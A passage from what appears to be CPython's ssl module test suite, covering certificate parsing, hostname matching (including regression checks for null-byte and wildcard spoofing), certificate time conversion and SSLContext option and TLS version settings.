san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
if major >= 3:
# 3.x uses 0xMNN00PP0L
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{patch:d}"
else:
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_openssl111_deprecations(self):
options = [
ssl.OP_NO_TLSv1,
ssl.OP_NO_TLSv1_1,
ssl.OP_NO_TLSv1_2,
ssl.OP_NO_TLSv1_3
]
protocols = [
ssl.PROTOCOL_TLSv1,
ssl.PROTOCOL_TLSv1_1,
ssl.PROTOCOL_TLSv1_2,
ssl.PROTOCOL_TLS
]
versions = [
ssl.TLSVersion.SSLv3,
ssl.TLSVersion.TLSv1,
ssl.TLSVersion.TLSv1_1,
]
for option in options:
with self.subTest(option=option):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.options |= option
self.assertEqual(
'ssl.OP_NO_SSL*/ssl.OP_NO_TLS* options are deprecated',
str(cm.warning)
)
for protocol in protocols:
with self.subTest(protocol=protocol):
with self.assertWarns(DeprecationWarning) as cm:
ssl.SSLContext(protocol)
self.assertEqual(
f'ssl.{protocol.name} is deprecated',
str(cm.warning)
)
for version in versions:
with self.subTest(version=version):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.minimum_version = version
version_text = '%s.%s' % (version.__class__.__name__, version.name)
self.assertEqual(
f'ssl.{version_text} is deprecated',
str(cm.warning)
)
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# The default security callback allows for levels between 0-5
# with OpenSSL defaulting to 1, however some vendors override the
# default value (e.g. Debian defaults to 2)
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
